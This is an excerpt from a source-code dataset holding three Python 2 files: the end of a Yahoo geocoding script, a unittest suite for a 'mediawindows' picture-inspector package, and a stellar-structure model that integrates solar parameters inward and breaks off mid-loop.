    literally ``q={0}``.  Parenthesizing the concatenation fixes it.
    """
    return ('http://where.yahooapis.com/geocode?q={0}&appid='
            + YAHOO_APP_ID + '&flags=J').format(location)
# Read one location per line (stdin or files given on argv), geocode each
# with Yahoo PlaceFinder, and print "latitude,longitude,postal" CSV rows.
for line in fileinput.input():
    # NOTE(review): *line* still carries its trailing newline and is not
    # URL-encoded before being embedded in the query -- confirm the service
    # tolerates both.
    r = requests.get(make_url(line))
    data = json.loads(r.text)
    # Take only the first (best) match returned by the geocoder.
    first_result = data['ResultSet']['Results'][0]
    print '{0},{1},{2}'.format(first_result['latitude'],
                               first_result['longitude'],
                               first_result['postal'])
|
UTF-8
|
Python
| false | false | 2,012 |
17,343,077,943,503 |
344da18b19886ab89f513d3537a6a53aa6424b84
|
0cab6615075e0ceaf1dcef3b906a824fc1380e01
|
/cpython/UnitTests/Test_mediawindows.py
|
b1c355f917f0a088c3b02b48357516fc560379eb
|
[] |
no_license
|
yuyutyrdinatry/pygraphics
|
https://github.com/yuyutyrdinatry/pygraphics
|
2c0a7fd6c6bc4cd68335eee09fec661aed5854d3
|
92396cb93a1019c5516c400925bbdef06c62174f
|
refs/heads/master
| 2016-09-14T13:23:38.467438 | 2011-10-11T23:55:36 | 2011-10-11T23:55:36 | 57,286,056 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
"""These are the tests for the mediawindows subpackage.
They test the production of graphical windows and so on. Some user interaction
may be required.
"""
# It may be worth looking into an automated GUI testing tool
# (like java.awt.Robot, but for CPython)
# These tests are often written in the style of vanilla unittest, because the
# style with nose used elsewhere in the test suite requires more typing.
import unittest
import subprocess
import sys
import os
import socket
import time
import media
import picture
import mediawindows as mw
from ampy import ampy as amp
def graphical_test(testcase):
    """Class decorator: keep *testcase* only when '--all' was passed on argv.

    Without '--all' the decorator returns None, which replaces the decorated
    class and effectively deletes the graphical test case from the module.
    """
    return testcase if '--all' in sys.argv else None
# Tell test collectors that the decorator itself is not a test.
graphical_test.__test__ = False
class RawInspectorTestCase(unittest.TestCase):
    """
    Test how the amp interface deals with closed windows behind the scenes.
    """
    def setUp(self):
        # Build a minimal 1x1 picture just to obtain a valid image object.
        pict = picture.Picture(1, 1)
        self.image = pict.image
        self.inspector_id = 0

    def tearDown(self):
        # Best-effort cleanup: the window under test may already be closed.
        try:
            self.stopInspect()
        except mw.exceptions.MediaWindowsError:
            pass

    def startInspect(self):
        """Open an inspector window for self.image and remember its id."""
        res = mw.callRemote(mw.amp.StartInspect, img=self.image,
                            inspectable=True)
        self.inspector_id = res['inspector_id']
        return res

    def stopInspect(self):
        """Close the inspector window opened by startInspect."""
        return mw.callRemote(mw.amp.StopInspect, inspector_id=self.inspector_id)

    def updateInspect(self):
        """Push the current image to the open inspector window."""
        return mw.callRemote(mw.amp.UpdateInspect,
                             inspector_id=self.inspector_id,
                             img=self.image)

    def pollInspect(self):
        """Ask the server whether the inspector window is closed."""
        return mw.callRemote(mw.amp.PollInspect,
                             inspector_id=self.inspector_id)

    def test_closeUnopenedRaises(self):
        """Closing an unopened window raises an exception"""
        # BUG FIX: assertRaises was called without the expected exception
        # class, making the assertion a no-op.  MediaWindowsError is the
        # package base error (see tearDown) -- confirm the exact subclass.
        self.assertRaises(mw.exceptions.MediaWindowsError,
                          self.stopInspect)

    def test_closeClosedRaises(self):
        """Closing a closed window raises an exception"""
        # BUG FIX: this test previously re-used the name
        # test_closeUnopenedRaises, silently shadowing it so only one of the
        # two ever ran.
        self.startInspect()
        self.stopInspect()
        self.assertRaises(mw.exceptions.MediaWindowsError,
                          self.stopInspect)

    def test_updateUnopenedRaises(self):
        """Updating an unopened window raises an exception"""
        self.assertRaises(mw.exceptions.MediaWindowsError,
                          self.updateInspect)

    def test_updateClosedRaises(self):
        """Updating a closed window raises an exception"""
        # BUG FIX: previously named test_updateUnopenedRaises (duplicate).
        self.startInspect()
        self.stopInspect()
        self.assertRaises(mw.exceptions.MediaWindowsError,
                          self.updateInspect)

    def test_pollUnopenedIsClosed(self):
        """The window starts off closed."""
        self.assertTrue(self.pollInspect()['is_closed'])

    def test_pollClosedIsClosed(self):
        """The window polls as closed after it's closed."""
        self.startInspect()
        self.stopInspect()
        self.assertTrue(self.pollInspect()['is_closed'])

    def test_shownIsNotClosed(self):
        """The window is open after being shown."""
        self.startInspect()
        self.assertFalse(self.pollInspect()['is_closed'])

    def test_show(self):
        """Showing assigns a nonzero inspector id"""
        self.startInspect()
        self.assertNotEqual(self.inspector_id, 0)

    def test_showTwice(self):
        """The same image can be shown multiple times."""
        self.startInspect()
        first_id = self.inspector_id
        self.startInspect()
        self.assertNotEqual(self.inspector_id, first_id)
        # Close the second window; leave the first for tearDown.
        self.stopInspect()
        self.inspector_id = first_id

    def test_update(self):
        """Images can be updated

        This doesn't test whether they actually are, just that nothing breaks
        terribly.
        """
        self.startInspect()
        self.updateInspect()
def raisable(e):
    """Return True iff raising *e* would not surface as a TypeError.

    A TypeError subclass (as a class) counts as True by definition; any
    other value is actually raised to see what comes out.
    """
    if isinstance(e, type) and issubclass(e, TypeError):
        return True
    try:
        raise e
    except TypeError:
        # Either e was a TypeError instance, or e was not raisable at all
        # (raising a non-exception itself raises TypeError).
        return False
    except:
        return True
class InspectorTestCase(unittest.TestCase):
    """
    Test the high level use of the proxied inspector through the Picture class
    """
    # TODO: use a mocked API for this!
    def setUp(self):
        self.picture = picture.Picture(1, 1)
        # Swap in a scripted callRemote so no real inspector server is needed.
        self.old_callRemote = mw.callRemote
        mw.callRemote = self.mocked_callRemote
        # tuples: (expected_cls, expected_kwargs, return/raise value) ...
        self.mock_actions = []

    def tearDown(self):
        mw.callRemote = self.old_callRemote
        if self.mock_actions:
            # this will be a test error, we probably don't really care...
            # arguably it should be an error _and_ we should do the check
            # in the test methods, but laziness trumps all
            self.fail("mock actions were not all taken: %s" % self.mock_actions)

    def mocked_callRemote(self, command, **kwargs):
        # Pop the next scripted action and verify the incoming call matches
        # the expected command class and keyword arguments.
        if not self.mock_actions:
            self.fail("Ran out of mock actions for callRemote(%s, **%s)" %
                      (command, kwargs))
        (expected_Command, expected_kwargs, action) = self.mock_actions.pop(0)
        self.assert_(issubclass(command, expected_Command))
        self.assertEqual(expected_kwargs, kwargs)
        # The scripted action is either a value to return or an exception
        # (class or instance) to raise -- see raisable().
        if raisable(action):
            raise action
        else:
            return action

    def test_openCleanly(self):
        """Images assign their inspector_id when they open a new window."""
        # show() first closes any previous window, then opens a new one.
        self.mock_actions = [
            (mw.amp.StopInspect,
             {"inspector_id": 0},
             {}),
            (mw.amp.StartInspect,
             {"img": self.picture.image, "inspectable": False},
             {"inspector_id": 1})]
        self.picture.show()
        self.assertEqual(self.picture.inspector_id, 1)

    def test_openDirty(self):
        """
        Images ignore errors when closing a window as part of opening a new
        inspector window.
        """
        self.mock_actions = [
            (mw.amp.StopInspect,
             {"inspector_id": 0},
             mw.exceptions.WindowDoesNotExistError),
            (mw.amp.StartInspect,
             {"img": self.picture.image, "inspectable": False},
             {"inspector_id": 1})]
        self.picture.show()
        self.assertEqual(self.picture.inspector_id, 1)

    def test_closeCleanly(self):
        """Images forward close requests"""
        self.mock_actions = [
            (mw.amp.StopInspect,
             {"inspector_id": 0},
             {})]
        self.picture.close()

    def test_closeUnopened(self):
        """Images ignore errors when closing a window."""
        self.mock_actions = [
            (mw.amp.StopInspect,
             {"inspector_id": 0},
             mw.exceptions.WindowDoesNotExistError)]
        self.picture.close()

    def test_updateCleanly(self):
        """Images forward update requests"""
        self.mock_actions = [
            (mw.amp.UpdateInspect,
             {"inspector_id": 0, "img": self.picture.image},
             {})]
        self.picture.update()

    def test_updateDirty(self):
        """
        Images turn update requests into show requests if there is no inspector
        window running.
        """
        self.mock_actions = [
            (mw.amp.UpdateInspect,
             {"inspector_id": 0, "img": self.picture.image},
             mw.exceptions.WindowDoesNotExistError),
            (mw.amp.StopInspect,
             {"inspector_id": 0},
             {}),
            (mw.amp.StartInspect,
             {"img": self.picture.image, "inspectable": False},
             {"inspector_id": 1})]
        self.picture.update()

    def test_isClosedYes(self):
        """is_closed forwards the request"""
        self.mock_actions = [
            (mw.amp.PollInspect,
             {"inspector_id": 0},
             {"is_closed": True})]
        self.assertTrue(self.picture.is_closed())

    def test_isClosedNo(self):
        """is_closed forwards the request"""
        self.mock_actions = [
            (mw.amp.PollInspect,
             {"inspector_id": 0},
             {"is_closed": False})]
        self.assertFalse(self.picture.is_closed())
class AsymmetricalPictureTestCase(unittest.TestCase):
    """Sometimes, silly bugs happen.

    Regression check for width/height mix-ups: uses a picture of size (2, 1).
    """
    def setUp(self):
        self.picture = picture.Picture(2, 1)

    def tearDown(self):
        self.picture.close()

    def testShow(self):
        # Showing a non-square picture must not crash.
        self.picture.show()

    def testUpdate(self):
        # Updating a shown non-square picture must not crash.
        self.picture.show()
        self.picture.update()
class OtherAsymmetricalPictureTestCase(AsymmetricalPictureTestCase):
    """Same checks with the dimensions swapped: picture of size (1, 2)."""
    def setUp(self):
        self.picture = picture.Picture(1, 2)
class LargePictureTestCase(unittest.TestCase):
    # Exercises the BigString workaround for AMP's 64 KiB value limit.
    def setUp(self):
        self.picture = picture.Picture(1000, 1000)

    def tearDown(self):
        self.picture.close()

    def test_pictureIsTooLarge(self):
        """If this fails, none of the other tests in this suite make sense.

        The picture's PIL tostring should have a length not representable
        in two bytes, making it incompatible with amp as a single value.
        """
        self.assertTrue(len(self.picture.image.tostring()) > 0xFFFF)

    def test_showLargePicture(self):
        """
        AMP only permits up to 64 kilobyte values. Pictures can be larger than
        that. To compensate, we use the BigString recipe from the amp wiki.
        This test ensures that it's being used correctly.
        """
        self.picture.show()
class OutdatedInspectorHandleTestCase(unittest.TestCase):
    """
    Sometimes an inspector can be updated by someone else. e.g. the user
    can close the window, despite .close() never being called.

    These tests simulate that, and check that the right things happen.
    We should never rely on a local understanding of what the current state
    is.
    """
    def setUp(self):
        # Open and close a window, then restore the stale inspector id so
        # the picture *thinks* its window is still open.
        self.picture = picture.Picture(1, 1)
        self.picture.show()
        outdated_inspector_id = self.picture.inspector_id
        self.picture.close()
        # oh no!
        self.picture.inspector_id = outdated_inspector_id

    def test_isOpen(self):
        # The stale handle must still report the window as closed.
        self.assertTrue(self.picture.is_closed())

    def test_update(self):
        # update() on a stale handle should reopen the window.
        self.picture.update()
        self.assertFalse(self.picture.is_closed())
        self.picture.close()

    def test_show(self):
        # BUG FIX: this method was also named test_update, which shadowed the
        # previous test so only one of the two ever ran.
        # show() on a stale handle should open a new window.
        self.picture.show()
        self.assertFalse(self.picture.is_closed())
        self.picture.close()
class MultipleAmpClientsTestCase(unittest.TestCase):
    """
    Because servers aren't safe for multiple clients (they might block at the
    whim of the client, etc.), they shouldn't accept multiple clients. This
    test case tests that.
    """
    def setUp(self):
        # A second proxy to the already-running mediawindows server.
        self.proxy = amp.Proxy('127.0.0.1', mw.amp.PORT, socketTimeout=None)

    def test_cantConnect(self):
        # The server must refuse this second connection attempt.
        self.assertRaises(socket.error, self.proxy.connect)
def _print_loud(msg):
underscores = "#" * min(len(msg), 80)
print
print underscores
print msg
print underscores
@graphical_test
class MultipleAmpServersTestCase(unittest.TestCase):
    """
    Because Windows doesn't have sensible support for anonymous pipes,
    a socket is used for communicating between processes. Sockets use ports
    from a global namespace, there can only be up to 65535 (0xffff) ports
    in use at any time, and the same port can't be used by independent
    processes.

    What this means is that if two processes import media, they need to both
    start a mediawindows process each, but they can't use the same process*.
    These tests confirm that they each create different processes and
    (presumably) work.

    [*] Note: it was mentioned that they can't use the same process. That isn't
    obvious, however. Perhaps they could cooperate and use the same process?
    Here are the reasons why that would be a bad idea:

    - **The processes are created as *sub*processes.** Unfortunately, due to
      the Windows OS lacking a daemonization mechanism (double-fork), the
      lifetime of a subprocess is inextricably linked to the lifetime of a
      process. So if they share a server, if the host dies, the other process
      loses all its open windows and has to start a new server.

    - **Some calls on the server might block.** In particular, the ask* dialogs
      are most likely blocking calls that will lock up the server entirely.
      It just can't be used by multiple clients.
    """
    def setUp(self):
        # Spawn a second Python process that imports media and shows a 1x1
        # picture; it prints its inspector id on stdout before exiting.
        self.proc = subprocess.Popen([sys.executable, "-c",
            """if 1:
                import media, picture
                x = picture.Picture(1, 1)
                x.show()
                print x.inspector_id
            """],
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE)
        _print_loud("Please close the window to proceed with the tests.")
        self.stdout, self.stderr = self.proc.communicate()

    def test_canShowPictureWithoutCrashing(self):
        try:
            # succeeds past the print, no extra data
            int(self.stdout)
        except ValueError:
            self.fail("stdout had non-int: %r" % (self.stdout,))
        # no error messages
        self.assertEqual(self.stderr, '')
        # exited with status 0
        self.assertEqual(self.proc.returncode, 0)

    def test_doesntUseOurServer(self):
        """
        It's possible that the subprocess's server crashes because the port is
        taken, but the client succeeds in connecting to our server in the
        current process. Let's check that this isn't true.
        """
        x = picture.Picture(1, 1)
        # ewww !
        # Adopt the subprocess's inspector id; if both processes shared one
        # server this handle would still refer to a live window.
        x.inspector_id = int(self.stdout)
        self.assertTrue(x.is_closed())
@graphical_test
class AmpAskTestCase(unittest.TestCase):
    """Tests for user interaction with Ask* Commands

    Because of the nature of these tests, they require user input. They are not
    automated, and can only be run directly. Run this test file with "--all"
    to include AmpAskTestCase.

    In the future it may be desirable to automate these tests.
    """
    def setUp(self):
        # Directory containing this test file; used as a known initialdir.
        self.workdir = os.path.abspath(os.path.dirname(__file__))

    def test_askCancel(self):
        _print_loud("Please press Cancel.")
        # Cancelling the dialog must surface as DialogCanceledException.
        self.assertRaises(mw.exceptions.DialogCanceledException,
                          mw.callRemote,
                          mw.amp.AskDirectory,
                          initialdir=self.workdir)

    def test_askInitialDir(self):
        _print_loud("Please press OK")
        # Accepting the dialog unchanged must return the initial directory.
        self.assertEqual(
            mw.callRemote(mw.amp.AskDirectory, initialdir=self.workdir)['path'],
            self.workdir)

    def test_askInitialDir2(self):
        _print_loud("Please press OK")
        self.assertEqual(
            mw.callRemote(mw.amp.AskDirectory, initialdir='/')['path'],
            '/')
@graphical_test
class AmpAskColorTestCase(unittest.TestCase):
    """Tests for user interaction with AskColor Command

    Because of the nature of these tests, they require user input. They are not
    automated, and can only be run directly. Run this test file with "--all"
    to include AmpAskColorTestCase.
    """
    # Initial RGB values preloaded into the color dialog.
    c123 = {'r': 1, 'g': 2, 'b': 3}

    def test_askCanceled(self):
        _print_loud("Please press Cancel.")
        self.assertRaises(mw.exceptions.DialogCanceledException,
                          mw.callRemote,
                          mw.amp.AskColor,
                          **self.c123)

    def test_askOk(self):
        _print_loud("Please press OK.")
        # Accepting unchanged must echo the initial color back.
        self.assertEqual(
            mw.callRemote(mw.amp.AskColor, **self.c123),
            self.c123)

    def test_askModify(self):
        _print_loud("Please increase each color value by 1.")
        # The user's edits must be reflected in the returned color.
        self.assertEqual(
            mw.callRemote(mw.amp.AskColor, **self.c123),
            dict((k, v+1) for k, v in self.c123.iteritems()))
@graphical_test
class AmpSayTestCase(unittest.TestCase):
    def test_Say(self):
        # Show a message window and have the human transcribe its contents
        # back; proves the Say command actually displayed the text.
        _print_loud("Please enter in the contents of the following window")
        text = "K"
        mw.callRemote(mw.amp.Say, text="K")
        self.assertEqual(raw_input('> '), text)
# Strip our custom '--all' flag before unittest.main() parses sys.argv,
# otherwise unittest would reject it as an unknown option.
if '--all' in sys.argv:
    sys.argv.remove('--all')
else:
    pass # relevant test cases have already been deleted.
class ProcessClosesCleanlyTestCase(unittest.TestCase):
    """
    While programs like 'import media; media.show(...)' shouldn't close until
    all the windows are closed, programs that don't open windows should close
    right away. This tests that.
    """
    def test_closesAfterOneSecond(self):
        # A bare import must not leave a lingering server keeping the
        # interpreter alive.
        proc = subprocess.Popen([sys.executable, '-c', 'import media'])
        time.sleep(1)
        # poll() returns None while the process is still running.
        if proc.poll() is None:
            self.fail("python -c 'import media' did not close in 1 second")
if __name__ == '__main__':
unittest.main()
|
UTF-8
|
Python
| false | false | 2,011 |
18,030,272,725,841 |
e682873b7fbaf60042eb24bb477909f0d7ac5bb7
|
8cc275af5c153ca81a3ef8250ddf8435c5ca0b08
|
/solar_model.py
|
f2a91b4fb5eced9b66e186e4d1b7bc8414a72516
|
[] |
no_license
|
PaulMag/AST3310_project1
|
https://github.com/PaulMag/AST3310_project1
|
1d90de2e5df23b27a948360658e67ee4ad44e9f9
|
53dc03178caea549b8e41791916cabdbc7f249c0
|
refs/heads/master
| 2020-12-24T15:41:27.219302 | 2014-05-19T22:15:07 | 2014-05-19T22:15:07 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# Package imports:
import os
import numpy as np
import sys
import matplotlib.pyplot as plt
# Physical constants:
c = 2.998e8 # [m/s]
sigma = 5.67e-8 # [W/m**2/K**4]
a = 4 * sigma / c # [J/m**3/K**4] # constant needed to calculate T_rad
u = 1.660538921e-27 # [kg] # atomic mass unit
k = 1.3806488e-23 # [J/K]
G = 6.67384e-11 # [m**3/kg/s**2]
MeV = 1.602176565e-13 # [J]
avogadro_inverse = 1 / 6.0221413e23 # the inverse of Avogadros number
# Ratios of different particles for star:
X = 0.7 # hydrogen
Y_3 = 1e-10 # helium3
Y = 0.29 # helium (total)
Z = 0.01 # all metals
Z_7Li = 1e-13 # lithium7
Z_7Be = 1e-13 # beryllium7
mu = 1. / (2*X + 3*Y/4. + Z/2.) # average particle mass in atomic mass units
# Convection parameters:
nabla_ad = 2. / 5 # adiabatic temperature gradient for ideal gas
alpha = 1. # mixing length
delta = 1. # ideal gases
c_P = 5/2. * k / (mu * u) # heat capacity for constant pressure
# Initial physical parameters for star:
try:
R0 = float(sys.argv[1]) # Usage: Give R0 as multiple of R_sun.
except:
R0 = 1 # R_sun is default
R0 *= 6.96e8 # [m] # x * R_sun
L0 = 1.0 * 3.846e26 # [w] # x * L_sun
M0 = 1.0 * 1.989e30 # [kg] # x * M_sun
T0 = 5770 # [K] # T_eff_sun
rho0 = 4.0e-4 # [kg/m**3]
P_rad0 = a / 3. * T0**4 # [Pa]
P_gas0 = rho0 * k * T0 / (mu * u) # [Pa] # equation of state
P0 = P_gas0 + P_rad0 # [Pa]
# Q's:
# How much energy each of the reaction give to the star when they happen.
Q_p_p = 1.177 * MeV
Q_d_p = 5.494 * MeV
Q_He3_He3 = 12.860 * MeV
Q_He3_He4 = 1.586 * MeV
Q_Be7_e = 0.049 * MeV
Q_Li7_p = 17.346 * MeV
Q_Be7_p = 0.137 * MeV
Q_B8 = 8.367 * MeV
Q_Be8 = 2.995 * MeV
# Names which are easier to remember:
# the numbers after Q_ tells which PP chains uses this Q value
Q_123 = Q_p_p + Q_d_p # proton-deuterium reaction happens immediately when deuterium available
Q_1 = Q_He3_He3
Q_23 = Q_He3_He4
Q_2a = Q_Be7_e
Q_2b = Q_Li7_p
Q_3 = Q_Be7_p + Q_B8 + Q_Be8 # no reaction rates for Q_B8 and Q_Be8 available
# Read opacity file:
infile = open("opacity.txt", "r")
logR_list = infile.readline() # list of the R's
logR_list = logR_list.split()[1:] # remove the word to the left
infile.readline() # skip empty line
logT_list = []
kappa_table = []
for line in infile: # read rest of file line by line
line = line.split() # divide the numbers into a list
logT_list.append(line.pop(0)) # place the first numer into the list of T's
kappa_table.append(line) # add the rest to a nested list of kappa values
infile.close()
logT_list, logR_list, kappa_table = np.array(logT_list), np.array(logR_list), np.array(kappa_table)
logT_list = logT_list.astype(float)
logR_list = logR_list.astype(float)
kappa_table = kappa_table.astype(float)
kappa_x = len(logR_list)
kappa_y = len(logT_list)
# Make placeholders for variables:
L = L0
R = R0
T = T0
P = P0
M = M0
rho = rho0
P_rad = P_rad0
P_gas = P_gas0
# Particle list:
class Particle:
    """Lightweight record for one particle species in the star.

    Attributes:
        mass    -- particle mass [kg]
        ratio   -- total mass ratio of this species
        rho_rel -- relative particle density, rho_rel = n / rho
    """
    def __init__(self, mass, ratio):
        # A value above 0.5 cannot be a particle mass in kilograms, so it is
        # interpreted as atomic mass units and converted to [kg].
        if mass > 0.5:
            mass = mass * u
        self.mass = mass        # particle mass [kg]
        self.ratio = ratio      # total mass ratio
        self.rho_rel = ratio / mass  # relative particle density
H = Particle(1.6738e-27, X)
He3 = Particle(5.0081e-27, Y_3)
He4 = Particle(6.6464e-27, Y - Y_3)
Li7 = Particle(7.01600455, Z_7Li)
Be7 = Particle(7.01692983, Z_7Be)
# Make the electron and set relative particle density to n_e = n_H + 2 * n_He:
e_ = Particle(9.10938291e-31, 0)
e_.rho_rel = H.rho_rel + 2 * He3.rho_rel + 2 * He4.rho_rel
# Functions:
def lam(i, j, T):
    # Reaction rate coefficient <sigma v> for the particle pair (i, j).
    # Takes two particle types and temperature as argument.
    # Checks what type of particles was given and picks the correct version of lambda.
    # Dividing by Avogadros number happens outside the function, in the loop.
    T = T / 1e9  # the fitting formulas below expect T in units of 1e9 K
    # PP I & II & III:
    if i == H and j == H:
        s = 4.01e-15 * T**(-2/3.) * np.exp(- 3.380 * T**(-1/3.)) \
            * ( 1 + 0.123 * T**(1/3.) + 1.09 * T**(2/3.) + 0.938 * T )
    # PP I:
    if i == He3 and j == He3:
        s = 6.04e10 * T**(-2/3.) * np.exp(- 12.276 * T**(-1/3.)) \
            * ( 1 + 0.034 * T**(1/3.) - 0.522 * T**(2/3.) - 0.124 * T \
            + 0.353 * T**(4/3.) + 0.213 * T**(-5/3.) )
    # PP II & III:
    if (i == He3 and j == He4) or (i == He4 and j == He3):
        T_star = T / (1 + 4.95e-2 * T)
        s = 5.61e6 * T_star**(5/6.) * T**(-3/2.) \
            * np.exp(- 12.826 * T_star**(-1/3.))
    # PP II:
    if (i == Be7 and j == e_) or (i == e_ and j == Be7):
        if T * 1e3 < 1: # T < 1e6
            # NOTE(review): reads the module-level globals e_ and rho here
            # rather than taking a density argument -- confirm intended.
            s = 1.57e-7 / (e_.rho_rel * rho)
        else:
            s = 1.34e-10 * T**(-1/2.) * (1 - 0.537 * T**(1/3.) + 3.86 * T**(2/3.)
                + 0.0027 * T**(-1) * np.exp(2.515e-3 * T**(-1)))
    if (i == Li7 and j == H) or (i == H and j == Li7):
        T_star = T / (1 + 0.759 * T)
        s = 1.096e9 * T**(-2/3.) * np.exp(- 8.472 * T**(-1/3.)) \
            - 4.830e8 * T_star**(5/6.) * T**(-2/3.) \
            * np.exp(- 8.472 * T_star**(-1/3.)) \
            + 1.06e10 * T**(-3/2.) * np.exp(- 30.442 * T**(-1))
    # PP III:
    if (i == Be7 and j == H) or (i == H and j == Be7):
        s = 3.11e5 * T**(-2/3.) * np.exp(- 10.262 * T**(-1/3.)) \
            + 2.53e3 * T**(-3/2.) * np.exp(- 7.306 * T**(-1))
    #print "LAMBDA = ", s * avogadro_inverse * 1e-6 # for debugging
    # NOTE(review): if no branch matched, *s* is unbound and this raises
    # NameError -- callers must only pass known particle pairs.
    return s * 1e-6 # convert to [m**3/s]
def rate(i, j, rho, T):
    """Number of reactions per kilogram per second between species i and j.

    Identical-particle pairs get the usual 1/(1 + delta_ij) correction so
    each pair is not double-counted.
    """
    kronecker = 1 if i == j else 0
    # n_j * n_i / (rho * (1 + delta)) * lambda_ij
    return i.rho_rel * j.rho_rel * rho / (1. + kronecker) * lam(i, j, T)
def kappa(T, rho):
    """Look up the opacity for (T, rho) in the pre-loaded opacity table.

    Uses nearest-neighbour lookup in log10(T) and log10(R), where
    R = rho / (T * 1e6) with rho in [g/cm**3].
    """
    logT = np.log10(T)
    rho = rho * 0.001 # convert to [g/cm**3]
    logR = np.log10(rho / T * 1e-6)
    # Find the temperature index:
    i = 0 # this will be the vertical index in kappa_table
    for logT_l in logT_list: # loop through temperatures from small to big
        if logT_l > logT: # stop when a temp is found which is larger than T
            if i > 0:
                if logT - logT_list[i-1] < logT_l - logT: # check if the previous temp from the list was closer
                    i -= 1 # if so, take one step back
            break # no need to check the rest
        i += 1 # increase index counter and repeat (check next)
    # Do the same to find the R index:
    j = 0 # this will be the horizontal index in kappa_table
    for logR_l in logR_list:
        if logR_l > logR:
            if j > 0:
                if logR - logR_list[j-1] < logR_l - logR:
                    j -= 1
            break
        j += 1
    # If T or rho is so large that they are off the table, print a warning and
    # take one step back to avoid IndexOutOfBoundsError:
    if i >= kappa_y:
        i = kappa_y - 1
        #print "Warning: T may have blown the kappa table."
    if j >= kappa_x:
        j = kappa_x - 1
        #print "Warning: rho may have blown the kappa table."
    kappa = 10**kappa_table[i,j] # find value in table and convert back from log
    # NOTE(review): opacity in cgs is [cm**2/g]; converting to SI [m**2/kg]
    # would be a factor 0.1, not 1000, and the unit in the comment below
    # looks wrong -- confirm this factor against the table's units.
    return kappa * 1000 # convert to [kg/m**3]
def flux_tot():
    """Total energy flux [W/m**2] through the sphere at the current radius."""
    surface_area = 4 * np.pi * R * R
    return L / surface_area
def flux_rad():
    """Radiative energy flux [W/m**2].

    With convection active only part of the flux is radiative; otherwise
    radiation carries everything and this equals flux_tot().
    """
    if not convection:
        return flux_tot()
    return 0.75 * a * c * G * T*T*T*T * M / (kap * P * R*R) * nabla
def flux_con():
    """Convective energy flux [W/m**2]: whatever radiation does not carry.

    Always call flux_rad() first, then flux_con().
    """
    if not convection:
        return 0.
    return flux_tot() - F_rad
def print_to_screen():
    """
    Writes the current result to screen for overseeing progress and debugging.

    All values (reads of module-level state) are shown relative to their
    initial surface values where a *0 suffix exists.
    """
    print
    print "resolution =", resolution
    print "diff_largest =", diff_largest
    print "dm =", dm
    print "M =", M / M0, "M0"
    print "rho =", rho / rho0, "rho0"
    print "R =", R / R0, "R0"
    print "P =", P / P0, "P0"
    print "P_r =", P_rad / P0, "P0"
    print "P_g =", P_gas / P0, "P0"
    print "L =", L / L0, "L0"
    print "T =", T / T0, "T0"
    print "eps =", eps
    print "kap =", kap
    print "F_r =", F_rad
    print "F_c =", F_con
    print "PP_123 =", eprod_123
    print "PP_1 =", eprod_1
    print "PP_2 =", eprod_2
    print "PP_3 =", eprod_3
    print "PP_23 =", eprod_23
def print_to_file():
    """
    Writes the current result to file for later plotting.

    One whitespace-separated row per call; the column order must match the
    plotting script that reads this data file.
    """
    outfile.write("%g %g %g %g %g %g %g %g %g %g %g %g %g %g %g %g\n" \
        % (dm, M, rho, R, P, L, T, eps, kap, F_rad, F_con, \
        eprod_123, eprod_1, eprod_2, eprod_3, eprod_23))
# Data output:
if len(sys.argv) < 3: # if no output name given
sys.argv.append("test") # default name
print "Outfile 'data2/test.dat' was made."
if len(sys.argv) < 4: # if no info given
sys.argv.append("") # set empty string
# Output file for results cmd-line-arg as filename:
outfile = open("data2/" + sys.argv[2] + ".dat", "w")
# If desirable, write information about current run on first line:
outfile.write(sys.argv[3] + "\n")
# Numerical parameters:
resolution = 0 # how often to show progress and write to file
# initial value 0 so that printout happens on first iteration
i = 0
def get_resolution():
    """Return the number of integration steps between data printouts.

    Chosen so output happens roughly every time the fastest-changing
    structure variable has moved by about 10 %.
    """
    fastest = max(abs(dR / R), abs(dP / P), abs(dL / L), abs(dT / T))
    steps = np.log(1.1) / np.log(1 + fastest)
    # Avoid too sudden increases early on; the +1 covers resolution == 0.
    if steps > 5 * resolution:
        steps = 5 * resolution + 1
    # Cap the printout interval.
    return 10000 if steps > 10000 else int(steps)
dm_min = - 1e10
dm_max = - 1e26
dm = - 1e15 # initial dm, will be changed dynamically
diff_min = 0.0005 # declare interval to contain the rate of parameter change within
diff_max = 0.001
diff_largest = 0 # declaration only, will be updated
# Integration loop:
# Integrate the stellar structure equations with mass as the integration
# variable, stepping inward from the surface (dm < 0) until some quantity
# drops to zero or below.
while True:
    # Parameters that can be found instantaneously:
    P_rad = a / 3. * T**4
    P_gas = P - P_rad
    rho = P_gas * mu * u / (k * T)  # ideal-gas equation of state
    # The sum of the reaction rates times the energy they produce:
    eprod_123 = rate(H, H, rho, T) * Q_123 # Energy production per mass
    eprod_1 = rate(He3, He3, rho, T) * Q_1 # for each of the PP-chains.
    eprod_2 = rate(Be7, e_, rho, T) * Q_2a + rate(Li7, H, rho, T) * Q_2b
    eprod_3 = rate(Be7, H, rho, T) * Q_3
    eprod_23 = rate(He3, He4, rho, T) * Q_23
    eps = eprod_123 + eprod_1 + eprod_2 + eprod_3 + eprod_23
    eps *= avogadro_inverse # does this here to avoid doing it several times
    kap = kappa(T, rho) # find opacity
    # Differential equations solved with Forward Euler:
    dR = 1. / (4. * np.pi * R*R * rho) * dm;
    dP = - G * M / (4. * np.pi * R*R*R*R) * dm
    dL = eps * dm
    # dT not determined before convection check is done
    # Check for convection (Schwarzschild criterion):
    nabla_rad = 3. * kap * L * P / \
        ( 64. * np.pi * sigma * T*T*T*T * G * M )
    #nabla_rad = (np.log(T - np.log(T)) / (np.log(P - np.log(P))
    # alternative?
    if nabla_rad > nabla_ad: # convective unstable => convection happens
        convection = True
    else: # convective stable => no convection
        convection = False
    if convection:
        # Mixing-length model for the actual temperature gradient.
        g = G * M / (R*R) # gravity acceleration
        H_P = P / (g * rho) # pressure scale height
        # TODO: H_P different for ideal gas?
        U = 64 * sigma * T*T*T / (3 * kap * rho*rho * c_P) \
            * (H_P * g * delta)**0.5 # internal energy
        l_m = alpha * H_P # mixing length
        RR = U / (l_m*l_m) # named RR to distinguish from radius R
        K = 4 * RR
        xi = np.roots([1./RR, 1, K, nabla_ad-nabla_rad]) # 2 complex and 1 real
        xi = float( np.real( xi[np.imag(xi) == np.min(np.abs(np.imag(xi)))] ) )
        # keeps the real root only
        nabla = xi*xi + K * xi + nabla_ad
        dT = nabla * T / P * dP
    else:
        # Purely radiative transport.
        dT = - 3 * kap * L \
            / ( 256. * np.pi*np.pi * sigma \
            * R*R*R*R * T*T*T ) * dm
    # Sometimes print out current progress in terminal and outfile:
    if i >= resolution:
        # Find fluxes:
